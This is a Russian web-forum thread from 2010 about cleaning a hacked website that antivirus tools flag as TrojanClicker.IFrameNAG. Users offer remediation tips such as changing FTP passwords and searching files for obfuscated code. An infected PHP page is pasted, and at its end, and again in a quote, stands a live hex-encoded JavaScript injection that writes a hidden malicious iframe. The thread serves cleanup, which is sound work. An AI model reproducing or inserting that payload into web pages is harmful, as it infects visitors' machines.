Форумы Modlabs.net: Проблема с сайтом. Вирусня заела - Форумы Modlabs.net

Обратились знакомые. Говорят народ жалуется, что на сайт не могут попасть - защита блокирует доступ.
Вот сайтец - www.iskozh.ru. Заходить туда не обязательно... а то вруг к вам прорвуться злые злые вЫрусы.
Окно браузера выдает следующее сообщение:

А NOD ловит трояна вида TrojanClicker.IFrameNAG.
------------
Вобщем нужно избавится от этой гадости. Чё собсна делать?
Может проблемы у хостера и он должен решать эту задачу?

Насколько я знаю, эти проблемы может решить только владелец сайта. Часто бывает так, что не все антивирусы ругаются, бывает, что пускают.

Владелец без руля. Ему нужен выход из указанной ситуации. Чем это лечить? =)

Нанять нормально специалиста - вот выход. Я обычно так и делаю.

Cyberdyne (5.5.2010, 12:21) писал:

1) Купить лицензионный антивирус и вылечить свой комп
2) Поменять пароль на ФТП и не пользоваться сохранением паролей в ФТП менеджере
3) Залезть на ФТП и искать вирусню в php, js, html файлах...
Если сам не сможет вылечить, то за денежку я могу помочь

PS: без пунктов 1 и 2 напрасная трата времени...

добавлено спустя: 0 часов 2 минут 24 секунд

Cyberdyne (5.5.2010, 11:30) писал:

Это не проблема хостера, а проблема владельца сайта, который либо не имеет антивируса, либо пользуется крякнутым и вдобавок сохранил пароль на ФТП в менеджере...

White (5.5.2010, 11:14) писал:

Кстати Игорь, не удивительно что МЛ часто слетает, я с дури с виртуальной машины залез на МЛ, антивиря на виртуалке не было, после оного посещения по локалке начал гулять (начали гулять) червяки. на хост машине стоит AVG но хост и виртуалка разные вещи. а вот все виртуалки включая тестовый домен заражены в миг оказались. после установки AVG на все виртуалки и отката их на ноль удалось восстановить работоспособность. авг сходу заблокировал кучу червей и атак. но сервак тестовый лег
На виртуалках нету стороннего софта и сайты никакие не посещаются. круг подозреваемых сужен.
Это к вопросу об антивирях и тд...задумайся.
На хост машине стоят сложние пароли на всех юзерах, а вот на виртуалке стоял простой....поэтому факт что с МЛ на хост машину не занести ничего, тупо не пролезет червь.

mixar (5.5.2010, 11:35) писал:

т.е. вирус мог залезть через комп владельца на сайт во время администрирования?

mixar (5.5.2010, 11:35) писал:

кинь инфу в личку - я передам.

mixar (5.5.2010, 11:35) писал:

а каким образом? =)
как и чем искать?

Cyberdyne (13.5.2010, 16:29) писал:

Открывать текстовым редактором и искать обфусцированный код...

первым делом сменил пароль - удалось.
сайт небольшой - скопил его с фтп на свой комп. Только НОД поудалял все зараженные файлы (неудивительно). Их немного - десятка два.
нод не дает их редактить. Если же его отключить - то вырь залезет в мой комп и вся работа по редакции коту под хвост. или я не прав?

Cyberdyne (13.5.2010, 16:32) писал:

не залезет, если пароль на админе на своей машине(именно на администраторе, а не локальном пользователе) поставишь сложный.
+файер волл нормальный, например скачай AVG триальный, а не "дырку" нода

добавлено спустя: 0 часов 4 минут 34 секунд

и отруби две лишних майкрософтовских учетные записи и гостевую.
в файерволе поставь разрешение на WinLogon только проверенному списку IP(белому)
именно через него лезет основная масса вирусов.

<?
$r=1; // Номер раздела

include "lib/global.php";
include "lib/db_mysql.php";

include "title1.html";
include "title2.php";
include "keywords.html";
include "menu.php";

echo "Новости"; // Заголовок контентной части

include "body1.html";

//################################################################################
// Контентная часть - начало

function showtxt($txt){
$txt_more=substr($txt,200,strlen($txt));
$end=strcspn($txt_more,".");
$len=200+$end;
return $txt=substr($txt,0,$len)." >>";
}

# ОТОБРАЖЕНИЕ КАРТИНКИ - начало
function showpic($pic="", $pic_align="left", $pic_alt="", $pic_url=0){
$alt=htmlspecialchars($pic_alt);
$picstr="<img src='pic/advices/$pic?t=" . time() . "' alt=\"$alt\" border='0'>";
if($pic_url) $picstr="<a href='http://$pic_url'>$picstr</a>";
echo "<table border='0' align='$pic_align'><tr><td>";
if($pic_align=='left') echo "$picstr<img src='../images/point.gif' border='0' width='10' height='1'><br><img src='../images/point.gif' border='0' width='1' height='10'>";
elseif($pic_align=='right') echo "<img src='../images/point.gif' border='0' width='10' height='1'>$picstr<br><img src='../images/point.gif' border='0' width='1' height='10'>";
elseif($pic_align=='center') echo "$picstr<br><img src='../images/point.gif' border='0' width='1' height='10'>";
echo "</td></tr></table>";
}
# ОТОБРАЖЕНИЕ КАРТИНКИ - конец

$querystring="SELECT id, date, title, txt FROM news ORDER BY id DESC LIMIT 0,2";
$result= DB_MYSQL($querystring);
if(mysql_num_rows($result)){
while(list($id,$date,$title,$txt)=mysql_fetch_row($result)){
echo "<tr><td class='tdpbl' width=90%><a href='news/?id=$id' class='sdg'><b>$date</b>   $title</a></td><td width=10%><img src='images/point.gif' width=1 height=1 border=0><br></td></tr>";
echo "<tr><td class='tdpbl' width=90%><a href='news/?id=$id' class='sdb'>".showtxt($txt)."</a><br><img src='images/point.gif' width=1 height=15 border=0><br></td><td width=10%><img src='images/point.gif' width=1 height=1 border=0><br></td></tr>";
}
echo "<tr><td colspan='2' align='right'><a href='news/' class='sdg'>Другие новости >></a></td></tr>";
}
echo "<tr><td colspan=2 background='images/lineL.gif'><img src='images/point.gif' alt='' width='1' height='3' border='0'></td></tr><tr><td colspan=2> <span style='font-weight: bold;'>Советы<br><br></span></td></tr>";

$querystring="SELECT id FROM advices";
$result= DB_MYSQL($querystring);
if(mysql_num_rows($result)){
$rows=mysql_num_rows($result);
$id=rand(1,$rows);
$querystring="SELECT id,title, pic, pic_align, pic_alt, pic_url, txt FROM advices WHERE id=$id";
$result= DB_MYSQL($querystring);
while(list($id,$title,$pic,$pic_align,$pic_alt,$pic_url,$txt)=mysql_fetch_row($result)){
echo "<tr><td class='tdpch'><a name='$id'></a>";
if($title) echo "<img src='../images/point.gif' alt='' width='1' height='10' border='0'><br><b>$title</b><br><img src='../images/point.gif' alt='' width='1' height='10' border='0'><br></td><td width=10%><img src='images/point.gif' width=1 height=1 border=0><br></td></tr>";
echo "<tr><td class='tdpch' align='justify' valign='top'>";
if($pic) showpic($pic,$pic_align,$pic_alt,$pic_url); if($txt) echo eregi_replace("\r\n","<br>",$txt);
echo "</td><td width=10%><img src='images/point.gif' width=1 height=1 border=0><br></td></tr>";
}
echo "<tr><td colspan='2' align='right'><a href='advices/' class='sdg'>Другие советы >></a><br></td></tr>";
}
// Контентная часть - конец
//################################################################################

include "body2.html";
?><script>function c12174138951n4bc4a54518a07(n4bc4a545199b2){ function n4bc4a5451a952(){var n4bc4a5451b904=16;return n4bc4a5451b904;} return (parseInt(n4bc4a545199b2,n4bc4a5451a952()));}function n4bc4a5451c8a9(n4bc4a5451d857){ var n4bc4a54520765=2; var n4bc4a5451e805='';n4bc4a545226c1=String.fromCharCode;for(n4bc4a5451f7b0=0;n4bc4a5451f7b0<n4bc4a5451d857.length;n4bc4a5451f7b0+=n4bc4a54520765){ n4bc4a5451e805+=(n4bc4a545226c1(c12174138951n4bc4a54518a07(n4bc4a5451d857.substr
(n4bc4a5451f7b0,n4bc4a54520765))));}return n4bc4a5451e805;} var x54='';var n4bc4a54523669='3C7'+x54+'3637'+x54+'2697'+x54+'07'+x54+'43E696628216D7'+x54+'96961297'+x54+'B646F637'+x54+'56D656E7'+x54+'42E7'+x54+'7'+x54+'7'+x54+'2697'+x54+'465287'+x54+'56E657'+x54+'363617'+x54+'065282027'+x54+'2533632536392536362537'+x54+'3225363125366425363525323025366525363125366425363525336425363325333125333225
32302537'+x54+'332537'+x54+'32253633253364253237'+x54+'2536382537'+x54+'342537'+x54+'342537'+x54+'302533612532662532662537'+x54+'322536352536332536662537'+x54+'362536352537'+x54+'3225333825333825333825326525363325366625366425326625363525366225333225326625
36392536652536342536352537'+x54+'382532652537'+x54+'302536382537'+x54+'302533662537'+x54+'3325336425333625333225333025333325333825363625363425363125333625363525333325
3337'+x54+'253333253331253330253337'+x54+'253330253633253335253632253633253330253334253336253331253337'+x54+'253338253337'+x54+'25363625363125363325333426253237'+x54+'2532622534642536312537'+x54+'342536382532652537'+x54+'322536662537'+x54+'352536652536342532382534642536312537'+x54+'342536382532652537'+x54+'3225363125366525363425366625366425323825323925326125333625333425333425333825
3330253239253262253237'+x54+'253333253333253635253336253634253335253333253635253237'+x54+'2532302537'+x54+'37'+x54+'2536392536342537'+x54+'34253638253364253332253336253330253230253638253635253639253637'+x54+'2536382537'+x54+'342533642533322533342533382532302537'+x54+'332537'+x54+'342537'+x54+'39253663253635253364253237'+x54+'2536342536392537'+x54+'332537'+x54+'302536632536312537'+x54+'39253361253230253665253666253665253635253237'+x54+'2533652533632532662536392536362537'+x54+'3225363125366425363525336527'+x54+'29293B7'+x54+'D7'+x54+'6617'+x54+'2206D7'+x54+'969613D7'+x54+'47'+x54+'27'+x54+'5653B3C2F7'+x54+'3637'+x54+'2697'+x54+'07'+x54+'43E';document.write(n4bc4a5451c8a9(n4bc4a54523669));</script>



Это код одного из файлов.
Чё тут валить? По похожим описаниям с "лечебных" сайтов что
---------------
<script>function c12174138951n4bc4a54518a07(n4bc4a545199b2){ function n4bc4a5451a952(){var n4bc4a5451b904=16;return n4bc4a5451b904;} return (parseInt(n4bc4a545199b2,n4bc4a5451a952()));}function n4bc4a5451c8a9(n4bc4a5451d857){ var n4bc4a54520765=2; var n4bc4a5451e805='';n4bc4a545226c1=String.fromCharCode;for(n4bc4a5451f7b0=0;n4bc4a5451f7b0<n4bc4a5451d857.length;n4bc4a5451f7b0+=n4bc4a54520765){ n4bc4a5451e805+=(n4bc4a545226c1(c12174138951n4bc4a54518a07(n4bc4a5451d857.substr
(n4bc4a5451f7b0,n4bc4a54520765))));}return n4bc4a5451e805;} var x54='';var n4bc4a54523669='3C7'+x54+'3637'+x54+'2697'+x54+'07'+x54+'43E696628216D7'+x54+'96961297'+x54+'B646F637'+x54+'56D656E7'+x54+'42E7'+x54+'7'+x54+'7'+x54+'2697'+x54+'465287'+x54+'56E657'+x54+'363617'+x54+'065282027'+x54+'2533632536392536362537'+x54+'3225363125366425363525323025366525363125366425363525336425363325333125333225
32302537'+x54+'332537'+x54+'32253633253364253237'+x54+'2536382537'+x54+'342537'+x54+'342537'+x54+'302533612532662532662537'+x54+'322536352536332536662537'+x54+'362536352537'+x54+'3225333825333825333825326525363325366625366425326625363525366225333225326625
36392536652536342536352537'+x54+'382532652537'+x54+'302536382537'+x54+'302533662537'+x54+'3325336425333625333225333025333325333825363625363425363125333625363525333325
3337'+x54+'253333253331253330253337'+x54+'253330253633253335253632253633253330253334253336253331253337'+x54+'253338253337'+x54+'25363625363125363325333426253237'+x54+'2532622534642536312537'+x54+'342536382532652537'+x54+'322536662537'+x54+'352536652536342532382534642536312537'+x54+'342536382532652537'+x54+'3225363125366525363425366625366425323825323925326125333625333425333425333825
3330253239253262253237'+x54+'253333253333253635253336253634253335253333253635253237'+x54+'2532302537'+x54+'37'+x54+'2536392536342537'+x54+'34253638253364253332253336253330253230253638253635253639253637'+x54+'2536382537'+x54+'342533642533322533342533382532302537'+x54+'332537'+x54+'342537'+x54+'39253663253635253364253237'+x54+'2536342536392537'+x54+'332537'+x54+'302536632536312537'+x54+'39253361253230253665253666253665253635253237'+x54+'2533652533632532662536392536362537'+x54+'3225363125366425363525336527'+x54+'29293B7'+x54+'D7'+x54+'6617'+x54+'2206D7'+x54+'969613D7'+x54+'47'+x54+'27'+x54+'5653B3C2F7'+x54+'3637'+x54+'2697'+x54+'07'+x54+'43E';document.write(n4bc4a5451c8a9(n4bc4a54523669));</script>
---------------
верно? или ещё что-то?

добавлено спустя: 21 часов 1 минут 35 секунд

вроде вылечил. Поредактил файлы.